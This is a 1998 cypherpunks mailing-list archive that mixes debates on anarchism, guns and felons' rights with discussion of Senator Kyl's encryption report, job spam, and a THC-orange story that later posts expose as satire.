	It specificly doesn't do that. For every person that says "I'd try
pot if it were legal", there are 10 who smoke it, and 20 more who've tried
it.

>it's not abused) - and I'm talking specificaly of a republican democracy
>like the US has.

	s/has/had/

>> 	When was the last time you _didn't_ kill someone just because it is
>> illegal?
>Every time. I can think of three times. Two accidents hunting and the third
>a crazy with a knife. On a personal level I felt my sense of justification
>from committing such an act didn't equate to me spending time in jail.
>They're still alive, and I didn't do time. Works for me. In all three times
>I could have shot them and walked off, I wouldn't have been found and there
>were no connections. All three times were completely random events,

	So the law DIDN'T stop you, you already admit you wouldn't have
been caught, and in at least one instance you probably SHOULD have capped
the person, for the good of soceity, yet you didn't.

	Why? Because ingrained in all of us (even Mr. May) is the idea that
it is wrong to kill other humans wantonly. At times our baser instincts
override this conditioning, and there are a few whom it never takes on, and
some people can override it at will, but it's still there.

	It'll still be there when the laws are dust.

>hapinstance. I quit hunting after the second hunting event. I also don't go
>for long walks on the other side of the tracks at 2am anymore when I can't
>sleep. Some junior high kid tried to rob me.

	You should have killed him, it was your civic duty.

>> 	It's expected, but illegal?
>How can it be illegal if there are no bodies to create them, courts to
>ejudicate them, supposedly unbiased police to enforce them. Now if we agree

	Sorry, lost the context, and I can't get it back at this hour.


>> 	It prevents government abuse, it prevents systemic abuse of power
>> and authority.
>
>Rape is rape, the point is to prevent it. Not just prevent it from your
>father.

	But rape is the functional equivelent of painting a flower right?

>> 	It also makes it easier to get people to resist abuse & to fight
>> back, since the abuse isn't built in, nor do the abusers have any sort of
>> "authority" to fall back on.
>People are more likely to suffer injustice as long as its sufferable. It's a
>rare event to incite a large population to violence.

	It wouldn't take a large population, since there is no societal
pressure preventing private retribution.

>> 	Which is different from now HOW?
>
>At least now there are limits to how ruthless they may be. You don't see

	No there isn't.

>tanks on your street corner, there aren't troops of men running around

	Yet.

>dragging people out of their homes because they're catholic or read 'Catcher
>in the Rye' or 'Atlas Shrugged' and shooting them. And people (like us right

	Yet.

>now) get to bitch about it with as near complete impunity as is possible in
>a real world. Hell through the amendment process we can concievably bypass
>the federal government completely. All that is required is the calling of a
>convention, which the federal government have no authority over (especialy
>since the right to peaceably assemble is protected and it don't get much more
>peaceable than a constitutional convention).

	Try it. Organize it and see what happens. If it looked at all like
you had a chance in hell of actually getting one together, you'd be
receiveing photographs of you with a cute little mexican boy in the most
*intersting* positions imaginable.

>> 	Isn't Billy Gates one of your poster boys for being ruthless? Isn't
>> he so far head of the rest of us that he could be in court for the rest of
>> his life and not spend everything?
>What makes Bill Gates reprehensible is not what he did with Microsoft,
>though the company as a whole should suffer. They certainly made profit
>together, they should share the flip side of the coin.
>Why I hold Bill Gates in so low esteem is his moral standing. A perfect

	But in a pantheistic universe, his actions are just as sacred as
yours.

>example is hurricane Mitch. The World Bank came up with a tad over $100M for
>releif. Bill makes that in a few days. Here is a man with the means to
>institute huge social, political, and economic change that at his level is
>a pittance and he does nothing. He is scum. He made his bed, let him lie in

	He (allegedly) donates large amounts of money to Gun Control, and
well, he has created a LOT of jobs, and maybe some of them donate the money.

	Putting a gun to his head an forcing him to be charitable is still
stealing.

>it. He didn't help others when they could have used it at little to no
>impact to him, why should they extend a helping hand in return?

	Because they are better than him? (I don't buy this)

>This is another excellent example of why anarcho-whatevers won't work. The
>psychology of the truly wealthy is so self-interested and goal-oriented

	The wealthy give more to charity every year than most people make.
I used to work for a woman who thought NOTHING of writing a 10,000 check to
certain charities. She wasn't paying ME that much in a year.

>instead of principled that they almost become pathological in their lack of
>empathy. The claim is that succesful business will be some sort of utopic,
>empathetic social force. It won't be, it isn't in human nature.

	Never claimed it would be utopia, in fact I never claimed it would
be better for most people than now, I just claim freer. I believe that to
be a better way.

>I gotta stop now, I'm sleepy.

	Yeah. I know that feeling.

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Nov 1998 12:24:37 +0800
To: cypherpunks@toad.com
Subject: Rivest Patent
Message-ID: <199811130259.VAA11936@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Ron Rivest received on November 10 "US Patent 5835600: 
Block encryption algorithm with data-dependent rotations:"

   http://jya.com/rivest111098.htm  (22K)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwcd@earthlink.net
Date: Fri, 13 Nov 1998 12:12:22 +0800
To: cypherpunks@toad.com
Subject: Free websites for Automotive industry
Message-ID: <pfdtvdfaioyiofwq>
MIME-Version: 1.0
Content-Type: text/plain



FREE - FREE - FREE - FREE - FREE - FREE - FREE
One of my favorite four letter words.

If you like FREE, and you could use ADVERTISING - - -
If you are involved in a business related to the automotive industry - - -
We need to talk. We have an consumer automotive resource center - we host websites for cars, trucks, parts, services, insurance, financing and everything to do with the automotive industry. 

If you would like to have a free website, and referrals from customers looking for what you have to offer, give us a try. You really can get something for nothing. With us.  

If you would like to join us, we welcome you. And it will be FREE - and when we have proven ourselves, and we all agree that what we have done has value and will continue to have value to you, we can talk about a fair exchange.

Thanks for the time. Please hit "Reply" and send us your contact information if you are interested.  

Chris 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 13 Nov 1998 21:22:56 +0800
To: cypherpunks@cyberpass.net
Subject: Nov. 15 column - felons with guns
Message-ID: <v04020a1bb271da6f30b1@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Fri, 13 Nov 1998 03:31:54 -0700
Date: Fri, 13 Nov 1998 00:15:54 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Nov. 15 column - felons with guns
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/590
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED NOV. 15, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    On the selective doling out of 'constitutional rights'

    T.T. writes in, in response to the Nov. 5 column in which I admitted
being a one-issue voter, rejecting any politician who won't trust me with a
gun:

  "Thank you, Vin, for raising the issue which has been bothering me for
quite a while:  when I read through the Bill of Rights, I cannot understand
why a convicted felon WHO HAS SERVED HIS OR HER TIME is, under the present
selective 2nd Amendment rights-lifting, not automatically and permanently
stripped of ALL of his or her rights, and not just the Second, plus voting:

  "Felon = no free speech, freedom to assemble, or, as you say, freedom to
go to the church of choice; no 3rd Amendment protections ... hey, quarter
those soldiers at will in the forever-felon's house! ... no 4th Amendment
protections, or 5th, or 6th (as you point out) nor 7th or 8th.  And of
course, the 9th and 10th are moot, since they're long-gone anyway for
everyone, felon and misdemeanor and non-convicted alike.

  "But if the power-geeks were to do this, why, then it would be too
blatantly obvious what was really happening, wouldn't it?

  "Best wishes, and thanks for keeping the faith so eloquently."

  I responded:

    #    #   #


  Yes. Does a felon, once he has "done his time" and "paid his debt to
society," again become a member of "the people" to whom all the rights in
the Bill of Rights apply, or not?

  If NOT, then indeed any government agency should be able to arrest anyone
who has EVER been convicted of a felony -- even a 90-year-old guy who
tended bar in a speakeasy in 1930 -- hold him without bond and without
letting him confront his accusers, in some foreign jurisdiction, torture a
confession out of him, convict him without a jury trial, and then subject
him to a cruel and unusual execution, all in secret. No problem with the
Bill of Rights -- it DOESN'T APPLY.

  Needless to say, under this evil premise, the government should also be
able to deny such a person the right to attend church, the right to publish
a newspaper or magazine, the right to own property which cannot be seized
on a bureaucrat's whim without compensation, etc.

  On the other hand, if that is NOT the situation which does or should
prevail, then it seems to me any former felon who is no longer on "parole"
has a right to vote and bear arms, along with all his other pre-existing
rights ... which after all are only ACKNOWLEDGED by the Bill of Rights as
having been ordained by the Creator, not actually "granted" therein.

  This business of creating different classes of citizens, with different
degrees of legal "disability," is the basis for virtually ALL the invasions
of our privacy -- up to and including the police numbering system on our
cars -- so frequently justified as "allowing us to check and make sure
you're not an escaping felon."

  (Note what a police state South Africa became, based on the simple notion
that one should have to show one's "racial identity card" to any policeman
who asked, to determine whether one had a right to be on a given street at
a given hour of the day -- and the sad absurdities it created, as visiting
Japanese businessmen were given passports declaring they were "white" so
they wouldn't have to suffer the indignities visited on South Africa's
native east Indian merchants, who carried second-class INTERNAL passports
identifying them as inferior "Asians.")

  There should be no NEED for me to ever "submit to a background check" to
prove I'm "not a felon." Felons should be in prison, or in the graveyard.

  "Parole" is the French word for "promise." If you can't trust a convict
to keep his "promise" not to acquire and carry a gun until his sentence
expires, then don't let him out on "parole." It's not (start ital)I(end
ital) who should have to suffer inconvenience or indignity because the
government wardens can no longer tell the difference between me and all
these convicted thugs they're allowing to wander the streets in plain
clothes.

  Start repealing one law a day until you have enough jail cells to keep
those guilty of violating our REMAINING laws (you might want to to keep
murder, forcible rape, and armed robbery on the books, while tossing out
drug use, "money laundering," and failure to pay gun "transfer taxes") in
stir for their FULL SENTENCES.

  And set the rest of us free.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 13 Nov 1998 23:01:30 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811131436.IAA32048@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 13 Nov 1998 12:02:52 +0000
> From: "Frank O'Dwyer" <fod@brd.ie>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> Under an "anarcho-whatever" people are left to their own devices.

And *that* is the primary failure of the entire theory. It's strongest point
is sufficient to kill it. No, actualy, it's strongest point demands that it
be killed. Very weak argument epistomologicaly, with little more to offer
than didactic charms.

The implication is that individuals are making societal policies with no
checks and balances (failure 1). In effect, the only way an individual will be
restrained is by some sort of natural community action (never mind that
people don't voluntarily act that way, failure 2). There is no clear
mechanism to arbitrate disagreements other than the above mechanism pretty
much eschewing any sort of standard of behaviour which further fosters
non-compliant behaviour (failure 3). There is no clear mechanism that
protects property or civil rights since the very arbitration mechanism
changes (and by implication the standards of ethics/morality it's held to)
on a case by case basis mediated by the whim of chance on the compatibility
of any two individuals personal views (failure 4). The arbitrary use of
violence is at no point addressed (failure 5). One of the primary arguments
for anarcho- based systems is to address corruption and unfair competition.
Yet at no point does it sufficiently address the guidelines as to what those
are let alone limits on their solutions (failure 6).

So what we are left with is a system whereby people mediate their actions
based on the compatibility of their personal philosophies. As I've said
before, anarcho- based systems make the same phsychological mistake that
every system other than a democracy makes; if it works for one person the
answer should be acceptable to another. The very fact that the contrary to
this is one of the reasons behind anarcho- support doesn't seem to impinge
upon the concioussness. Anarchy is contradictory at the axiomatic level.

Another way to see it is: Let people do what they want and they'll naturaly
                          conform to what I want.

There is this same axiomatic problem with Hayek's economics and social
theories.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Fri, 13 Nov 1998 16:59:59 +0800
To: cypherpunks@cyberpass.net
Subject: oranges spliced with THC gene
Message-ID: <19981113084010.27182.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain




http://www.sfbg.com/wire/20.html

oranges with spliced-in gene for THC

20-30 seeds already distributed until Janet got her hands in it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Sat, 14 Nov 1998 00:06:13 +0800
To: Rabid Wombat <cypherpunks@toad.com>
Subject: Re: JOBOP Software Engineer
In-Reply-To: <Pine.BSF.3.91.981112204351.12582A-100000@mcfeely.bsfs.org>
Message-ID: <364C4650.F684BA0E@imho.net>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat wrote:
> 
> What kind of drugs go with the salary?
> 
> (Most of the people on this list
> could use the side benefits.)
> 
> On Thu, 12 Nov 1998 mxm@candseek.com wrote:
> 
> > Since your address was listed on a software engineering
> > oriented site, I was hoping you could help me out.
HUMMMM this is the message to the list...
the LOW LOW salary of 90K  
> > Salary to $90,000 with a generous benefits package.
> >
> > If you know of anyone that might be interested, please forward
> > this email or contact me directly.
> >
> > Thank You,
> >
> > Megan McCullough
> >
> > Diedre Moire Corporation


NOW if you read the message that I received from Megan in my personal
email box not the list I can get 10K more for the LOW LOW salary of
100,000$  Check it out!
	Hey megan are you reading this????  Do I have to move or Can I live
where I do and telecommute?  IF I have to move I want 200,000$ US.
	> 
> Since your email address was listed on a related web site page 
> or database, I thought you might help. I am seeking an individual 
> within the following conditions:
> 
> I am currently looking for individuals with a strong background 
> in software engineering particularly with Visual C++. My client 
> is a start up company which was started in 1989 to help clinicians 
> treat more patients in less time, while the information they must 
> consider expands at an alarming. They do this by developing software 
> products that give clinicians access to the information they need to 
> really impact care and productivity. The software engineer will work 
> as a part of a development team to identify and develop new 
> product directions and to modify existing product lines to meet 
> the needs of individual clients. For this exciting, growth opportunity, 
> I am looking for someone that has at least 5 years of software 
> engineering experience using Visual C++. An ideal candidate 
> will also have hands on experience with COM, Activex, XML, 
> and SGML. For the right person, the salary can go up to 
> $100,000 with a generous benefits package. 
> 
> Geographic Location of Position: Falls Church, VA
> 
> If you know anyone that might be interested, please forward 
> this to them or contact:
> 
> Megan McCullough
> Diedre Moire Corporation
> Voice: 609-584-9000ext275
> Fax: 609-584-9575
> Email: 915602@candseek.com 
> 
> 
> 
> 
> 

> > 510 Horizon Center
> > Robbinsville, NJ 08691
> > (609) 584-9000ext275
> > (609) 584-9575 (fax)
> > mxm@candseek.com
> >
> >
> >
> >
> >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 13 Nov 1998 23:35:52 +0800
To: mix@anon.lcs.mit.edu (lcs Mixmaster Remailer)
Subject: Oranges with marijuana genes == HOAX
In-Reply-To: <19981113084010.27182.qmail@nym.alias.net>
Message-ID: <199811131453.IAA02761@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I think that the original news release was likely a hoax. It even
said something to the effect that "this may be fiction" in the last
paragraph. Too bad no one actually pays attention and reads whole
articles.

``The South to the Future World Wide Wire Service is a weekly feed of
technology and media news commentary and satire published by the San
Francisco Bay Guardian. Quotations attributed to public figures who
are satirized are often true, but sometimes invented. Some fictional
statements may, in fact, be true. Any other use of real names is
accidental and coincidental. Editorial questions may be sent to John
Paczkowski. '

igor

lcs Mixmaster Remailer wrote:
> 
> 
> 
> http://www.sfbg.com/wire/20.html
> 
> oranges with spliced-in gene for THC
> 
> 20-30 seeds already distributed until Janet got her hands in it
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 14 Nov 1998 02:31:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: ISPI Clips 6.28: Wiretapping Internet Phone Lines
Message-ID: <364C7187.6E24@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



This little phone looks nice with one gotcha: they left out encryption. 
Did they do this just to sell internationally and avoid the privacy
issue altogether?

Considering how the product is constructed, adding encryption would not
be a major step.

Mike

***********************************************************************


Not all companies are complaining about CALEA.

Aplio [ http://www.aplio.com/ ] CEO Olivier Zitoun believes his
company's
products fall into the FCC's definition of computer-to-computer IP
telephony. Aplio sells boxes that can be plugged into normal touch-tone
phones and used to call an Internet provider, which routes calls over
the
Net.

"We are very different than other phone-to-phone devices or solutions,"
Zitoun said. "In a way, the discussion of IP-telephony regulation
doesn't
really apply to us."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 14 Nov 1998 03:20:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Info Age Crime Terror and War
In-Reply-To: <199811131719.MAA28612@smtp0.atl.mindspring.net>
Message-ID: <v0313031ab272285d8bc8@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:09 AM -0800 11/13/98, John Young wrote:
>Senator Kyl has issued a long report, "Crime, Terror &
>War: National Security and Public Safety in the Information
>Age," which recounts his Subcommittee's hearings and
>recommendations on encryption, Y2K, terrorism, info war,
>domestic preparedness, wiretap, and more:
>
>   http://jya.com/ctw.htm  (97K)
>
>It describes a plan to combat threats to critical infrastructure
>and the US homeland which, if implemented, would criminalize
>much held dear to a few of this list's subscribers; other lurkers
>will be overjoyed to read Kyl coming to the rescue of careers
>and budgets of MIB and their suppliers of technological of
>political control.
>
>He wants DoD to get cracking on domestic protection, move over
>piddling LEA. Civil liberties, nonsense. Crypto genie out of the bottle,
>more nonsense. Getting government access to encrypted
>communications, you bet. Through commercial products, yep.

I'll address one section, near the end of the report:

--begin excerpt--

The "genie premise" is that encryption software is free and widely
available (PGP being the most frequently cited example), rendering moot any
attempt to impose controls
over its transfer, manufacture or use. Yet at the same time, manufacturers
and sellers of products with encryption features argue that they are losing
market share to foreign
competition because of export controls. Which raises the question: if users
can simply download encryption software for free, why is there still a
market for American products
with encryption features?

The answer must be that the demand for American products is based on
something more than encryption features alone. If that is true, it implies
the possibility of addressing
the needs of law enforcement without jeopardizing market share. In that
regard, Chairman Kyl offered a model of the domestic market for information
security solutions. The
proponents of domestic controls may have done a disservice in focusing on a
one-size fits all technical solution such as "key recovery." Such a focus
limits the search for
acceptable solutions to the cryptography-without due regard to the reality
that cryptography is just one piece of the information security puzzle.
Chairman Kyl's framework
suggests that discrete applications and user groups must be addressed
individually, providing an opportunity to identify promising technical
solutions for accessibility where
and when it is most useful.

--end excerpt--

This tells us that the focus of our Cypherpunks efforts should continue to
be on "payload" crypto and integration of interesting crypto items into the
text or HTML payloads which these other applications work with.

It looks obvious from the above--and from our years of seeing Jim Clark and
suchlike talk about "meeting the legitimate needs of law enforcement"--that
the Feds will try to get the applications makers to incorporate key
recovery. Ditto for the routers and packet movers.

But all this is mooted by two major approaches:

1. Crypto at the message, or text, or payload level. Whatever Netscape or
Microsoft or Lotus may do at the application level is made moot if people
are using PGP or similar approaches. Furthermore, the constitutional
protections are strong at the message level--jailing a person for not
writing in an approved language is rather clearly a violation of the First
Amendment.

(This is a familiar message, about concentrating on the _contents_ of
communcation systems. Many of us have been making this point for years and
years. But it bears repeating in light of things like "Private Doorbell"
and attempts to build CALEA (Communications Assistance for Law Enforcement,
aka Digital Telephony) compliance into various systems.)

I like the integration of PGP into Eudora, but I would rather have to do
manual cut-and-paste operations than have some CALEA-compliant version of
Eudora implement GAK-friendly crypto. I'm not accusing the Eudora folks of
thinking of doing this, just trying to look ahead a few years to a world
where the major ISPs and Web corporations have acquiesced to CALEA
pressures.

2. Proxies and offshore remailers. Whatever the U.S. gov't. does, hard to
control offshore services. And, again, the crypto needs to be at the
payload level, so that all traces of GAK and whatnot can be easily removed.
(The "::request-remailing-to" in the text field being a beautiful example
of this. Very hard for governments to insist on what can and cannot be
inside text fields!)

And applications like digital money, if they ever get off the ground, will
also benefit from some of the same kinds of thinking. (Ian Goldberg's
demonstrations of his variant of Chaumian digital cash were of this sort,
using conventional tools with the salient digital cash stuff orthogonal to
the basic communications tools. We want this instead of, say, "Netscape
Cash," implemented as part of Navigator and fully compliant with TLA
wishes.)

Anyway, I haven't been able to work up a lot of energy to write stuff here
on the Cyphepunks list, for the usual reasons, but reading this Kyl report
on plans to further stifle civil liberties motivates me to emphasize the
obvious.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 14 Nov 1998 01:21:30 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811131436.IAA32048@einstein.ssz.com>
Message-ID: <199811131629.LAA09514@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:36 AM 11/13/98 -0600, Jim Choate wrote:

>So what we are left with is a system whereby people mediate their actions
>based on the compatibility of their personal philosophies. 

Standard interoperation of different protocols.  We do it all the time.

>As I've said
>before, anarcho- based systems make the same phsychological mistake that
>every system other than a democracy makes; if it works for one person the
>answer should be acceptable to another. The very fact that the contrary to
>this is one of the reasons behind anarcho- support doesn't seem to impinge
>upon the concioussness. Anarchy is contradictory at the axiomatic level.
>
>Another way to see it is: Let people do what they want and they'll naturaly
>                          conform to what I want.

Who cares what they do as long as they leave me alone.

>There is this same axiomatic problem with Hayek's economics and social
>theories.

He was not an anarchist.

If voluntary interaction doesn't work as a social system then we're all in
big trouble because persons (you?) who love to command others will have a
hard time doing so as everyone becomes rich, mobile, and technologically
powerful.  If you have figured out a way to push around rich, mobile, and
technologically powerful people you're a smarter man than I am.  I'm sure
the Feds could use your unique insights.

BTW we live in a representative republic not a democracy and the theory was
that it was to be a representative republic of strictly limited powers.
Our representatives have forgotten.  Technology and market institutions are
teaching them different.

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpu <cyphrpnk@rainbow.thinkthink.com>
Date: Sat, 14 Nov 1998 04:57:23 +0800
To: cypherpunks@cyberpass.net
Subject: SIGH... NOT!! THC tainted oranges
Message-ID: <199811131959.LAA19533@rainbow.thinkthink.com>
MIME-Version: 1.0
Content-Type: text/plain




I just spoke by phone with john(author of the article in question)
 at the sfbay guardian
The article was distributed without the satire labeling that was
present at the website... The article is Satire :(

     duped and disappointed :(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Fri, 13 Nov 1998 20:32:28 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811101638.KAA18839@einstein.ssz.com>
Message-ID: <364C1FEC.F312A063@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> At least citizens can change the laws under a democracy.
> Under an anarcho-whatever it is strictly lump it or like it unless you're
> willing to fund a bigger gun.

Under an "anarcho-whatever" people are left to their own devices. This
leaves them free to do anything, including institute governments, pass
laws, form unions, inject themselves with battery acid, shoot everyone
wearing glasses, and climb towers to pick off passers-by with a
high-velocity rifle. What people on both extremes seem to miss is that
the world is already, and always has been, an anarchy; the experiment is
ongoing, and so far "all of the above" is the outcome. 

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Nov 1998 02:07:09 +0800
To: cypherpunks@toad.com
Subject: Info Age Crime Terror and War
Message-ID: <199811131719.MAA28612@smtp0.atl.mindspring.net>
MIME-Version: 1.0
Content-Type: text/plain



Senator Kyl has issued a long report, "Crime, Terror &
War: National Security and Public Safety in the Information
Age," which recounts his Subcommittee's hearings and 
recommendations on encryption, Y2K, terrorism, info war,
domestic preparedness, wiretap, and more:

   http://jya.com/ctw.htm  (97K)

It describes a plan to combat threats to critical infrastructure
and the US homeland which, if implemented, would criminalize
much held dear to a few of this list's subscribers; other lurkers
will be overjoyed to read Kyl coming to the rescue of careers 
and budgets of MIB and their suppliers of technological of
political control. 

He wants DoD to get cracking on domestic protection, move over 
piddling LEA. Civil liberties, nonsense. Crypto genie out of the bottle, 
more nonsense. Getting government access to encrypted 
communications, you bet. Through commercial products, yep.

Thanks to FT for forwarding.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 14 Nov 1998 05:27:15 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: Info Age Crime Terror and War
In-Reply-To: <199811131720.MAA28921@smtp0.atl.mindspring.net>
Message-ID: <364C9320.2E73@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



John,

The 1st - encrypted communications are speech.

The 4th - plaintext that has been encrypted cannot be "found."

The 5th - If your password is memorized then the only way to produce it
is as a witness against yourself. 

So much for the layman's view. What is the current legal thinking and,
more importantly, the relevant legal precedents? Aren't they ( LE )
making a bit of a leap when they say that the Constitution defines
access to information not just items? It looks like the only way to
achieve the information access they want is through modification of the
Constitution.

There is often a right-leaning political flavor to the CP list but isn't
it such right-wingers as Rhenquist and Starr who invented the various
forms of immunity that already can be used to subvert the 5th?

Now they are trying to establish the legal equivalence of the physical
and the virtual. I wish Kyle et al well in their fight against legions
of terrorists but I hope that they have an impossible battle ahead of
them when it comes to downgrading the Bill of Rights. Besides, more than
wanting to protect us little lambs from terrorists, I think they
recognize the degree to which technology is changing the world and are
trying to resist the power shifts that are likely. The other reasons
they give are mostly chaff.

Regards,
Mike

John Young wrote:
> 
> Senator Kyl has issued a long report, "Crime, Terror &
> War: National Security and Public Safety in the Information
> Age," which recounts his Subcommittee's hearings and
> recommendations on encryption, Y2K, terrorism, info war,
> domestic preparedness, wiretap, and more:
> 
>    http://jya.com/ctw.htm  (97K)
> 
> It describes a plan to combat threats to critical infrastructure
> and the US homeland which, if implemented, would criminalize
> much held dear to a few of this list's subscribers; other lurkers
> will be overjoyed to read Kyl coming to the rescue of careers
> and budgets of MIB and their suppliers of technologies of
> political control.
> 
> He wants DoD to get cracking on domestic protection, move over
> piddling LEA. Civil liberties, nonsense. Crypto genie out of the bottle,
> more nonsense. Getting government access to encrypted
> communications, you bet. Through commercial products, yep.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Fri, 13 Nov 1998 13:12:58 +0800
To: cypherpunks@infonex.com
Subject: NotSoBlackNet: terrorist pays by money order
Message-ID: <88e9a70643e903c58148f5106afd11bd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



http://www.wired.com/news/news/politics/story/15812.html
Do Terrorists Troll the Net?
by Niall McKay

[...] "We fight for our independence," he said during one June
conversation. Harkat-ul-Ansar is on the State Department's list of the
30 most dangerous terrorist organizations in the world.

Establishing Ibrahim's true identity is difficult. The most compelling
evidence that he was acting on behalf of Harkat-ul-Ansar is a US$1,000
money order that he sent to Chameleon in an attempt to buy stolen military
software. [...]

Although he used several anonymous Hotmail accounts to send his
email, Ibrahim always accessed the Net from an Internet service
provider in New Delhi [...]

Savec0re said he also emailed the individual an encrypted file of
information from the Indian atomic research center, including diagrams
of reactors and trajectory calculations, and an analysis of five
Indian nuclear tests. "The next day I got a call from the so-called
FBI agent but he had an amazingly strong Pakistani accent," [...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 02:19:27 +0800
To: Digital Bearer Settlement List <mac-crypto@vmeng.com
Subject: dbts: Hettinga's Road Trip to London...
Message-ID: <v04020a03b2720b44abaf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


After much hemming and hawing about plane and hotel arrangements, the final
confirmation from some conference organizers arrived this past Monday morning.
And, yesterday, the State Department promised me a passport on my doorstep
this coming Tuesday. So, it now looks like I'm going to London on next
Saturday's redeye to speak at the Internet Trading for Global Securities
Markets conference, Tuesday and Wednesday, November 24th and 25th at the
Hilton Olympia.

Because of some interesting economics of cheap hotel room-nights and dear
airfare, I'll be staying at the Hilton Olympia itself, on Kensington High
Street in London, from the morning of Sunday the 22nd to the morning of
Thursday the 26th.

This conference has been in the works for months, but we weren't really sure
everything was going to happen until, as usual, the last possible minute. I
bet a whole bunch of people registered right on the deadline, or something,
and they decided they had enough interest to pull the trigger. Oh, well, after
